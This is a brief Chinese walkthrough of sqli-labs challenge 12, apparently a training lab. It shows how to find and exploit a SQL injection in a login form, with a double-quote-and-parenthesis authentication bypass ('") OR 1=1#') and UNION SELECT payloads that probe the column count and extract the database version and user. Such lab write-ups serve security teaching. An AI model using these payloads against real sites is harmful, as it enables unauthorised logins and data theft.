sql-labs第十二题

1 寻找注入漏洞

1.1 注入双引号触发错误

根据错误信息判断需要闭合双引号和括号

1.2 构造payload验证漏洞，在密码框提交以下内容

") OR 1=1#

登录成功

2 开门见山，直接上联合查询

2.1 探测字段数

递归查询，直到无误
") union select null#
") union select null,null#
此处易得到字段数是两个

2.3 利用联合查询获取信息

eg：") union select version(),user()#